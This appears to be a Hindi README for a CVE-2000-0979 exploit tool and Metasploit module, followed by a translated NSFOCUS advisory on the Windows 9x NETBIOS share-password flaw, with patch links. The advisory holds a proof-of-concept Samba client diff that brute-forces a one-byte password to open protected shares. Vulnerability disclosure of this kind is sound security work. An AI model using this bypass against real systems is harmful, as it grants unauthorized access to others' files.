
CVE-2000-0979
CVE-2000-0979.rb विंडोज 95 SMB सेवा के विरुद्ध CVE-2000-0979 का शोषण करने के लिए स्टैंडअलोन टूल है।
msf_2000_0979.rb मेटास्प्लॉइट मॉड्यूल है। आप इसे यहाँ कॉपी कर सकते हैं: metasploit-framework ▸ modules ▸ auxiliary ▸ scanner ▸ smb

जल्द ही और दस्तावेज़ीकरण आ रहा है!
NSFOCUS Security Advisory(SA2000-05)
विषय: माइक्रोसॉफ्ट विंडोज 9x NETBIOS पासवर्ड सत्यापन भेद्यता
जारी करने की तिथि: अगस्त 24, 2000 अद्यतन तिथि: अक्टूबर 11, 2000
Microsoft Windows 9x NETBIOS प्रोटोकॉल कार्यान्वयन द्वारा उपयोग किए जाने वाले पासवर्ड सत्यापन योजना में एक भेद्यता मौजूद है। यह भेद्यता किसी भी उपयोगकर्ता को पासवर्ड सुरक्षा के साथ Windows 9x फ़ाइल साझा सेवा तक पहुँचने की अनुमति देगी। हमलावर को साझा पासवर्ड जानने की आवश्यकता नहीं है।
आप Microsoft Windows 9x सिस्टम के साझा संसाधनों की सुरक्षा के लिए पासवर्ड सेट कर सकते हैं। लेकिन Microsoft Windows 9x NETBIOS प्रोटोकॉल कार्यान्वयन द्वारा उपयोग किए जाने वाले पासवर्ड सत्यापन योजना में एक भेद्यता मौजूद है। पासवर्ड सत्यापित करने के लिए, पासवर्ड की लंबाई क्लाइंट से सर्वर को भेजे गए डेटा की लंबाई पर निर्भर करती है। अर्थात, यदि कोई क्लाइंट पासवर्ड की लंबाई एक बाइट निर्धारित करता है और पैकेट को सादे पाठ पासवर्ड के साथ सर्वर को भेजता है, तो सर्वर इसकी तुलना केवल साझा पासवर्ड (सादा पाठ) के पहले बाइट से करेगा, और यदि संगत है, तो सत्यापन प्रक्रिया पूरी हो जाती है। हमलावर को केवल पीड़ित में पासवर्ड के पहले बाइट का अनुमान लगाने और प्रयास करने की आवश्यकता है। Windows 9x रिमोट प्रबंधन प्रणाली भी प्रभावित है क्योंकि यह उसी साझा पासवर्ड प्रमाणीकरण पद्धति को अपनाती है।
इस बग को प्रदर्शित करने के लिए यहाँ एक सरल उदाहरण है। samba स्रोत पैकेज प्राप्त करें और स्रोत/client/client.c को इस प्रकार संशोधित करें:
--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
DEBUG(4,(" session setup ok\n"));
+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n"));
माइक्रोसॉफ्ट फ़ाइल और प्रिंट साझा सेवा बंद करें।
Microsoft को सूचित किया गया है और इस दोष के संबंध में एक सुरक्षा बुलेटिन जारी किया गया है।
बुलेटिन इस पर उपलब्ध है:
http://www.microsoft.com/technet/security/bulletin/MS00-072.asp
पैच निम्नलिखित पर उपलब्ध हैं:
. Microsoft Windows 95
पैच शीघ्र ही उपलब्ध होगा
. Microsoft Windows 98 और 98 Second Edition
http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE
. Microsoft Windows Me
http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE
प्रदान की गई जानकारी NSFOCUS द्वारा "जैसी है" किसी भी प्रकार की वारंटी के बिना जारी की गई है। NSFOCUS सभी वारंटियों को अस्वीकार करता है, चाहे वे व्यक्त हों या निहित, व्यापारिकता की वारंटियों को छोड़कर। किसी भी स्थिति में NSFOCUS किसी भी क्षति के लिए उत्तरदायी नहीं होगा जिसमें प्रत्यक्ष, अप्रत्यक्ष, आकस्मिक, परिणामी, व्यावसायिक लाभ की हानि या विशेष क्षति शामिल है, भले ही NSFOCUS को ऐसी क्षति की संभावना के बारे में सलाह दी गई हो। जानकारी का वितरण या पुनरुत्पादन इस शर्त पर प्रदान किया जाता है कि सलाह को किसी भी तरह से संशोधित नहीं किया गया है।
?Copyright 1999-2000 NSFOCUS. All Rights Reserved. Terms of use.
NSFOCUS Security Team [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)